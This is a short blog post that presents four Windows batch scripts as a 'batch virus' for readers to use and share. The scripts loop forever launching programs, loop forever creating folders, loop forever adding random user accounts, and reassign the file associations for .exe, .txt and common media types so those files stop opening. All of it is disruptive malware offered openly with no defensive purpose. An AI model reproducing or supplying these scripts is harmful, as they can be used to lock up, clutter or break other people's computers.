Friday, March 3, 2017

Batch Virus by Vivek Kumar


@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
____________________________________

@echo off
:x
md %random% // makes directory/folder.
goto x
____________________________________

@echo off
:x
net user %random% /add //create user account
goto x
____________________________________

@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
____________________________________
Note : if you find this helpful then share this to help more and more peoples.

No comments:

Post a Comment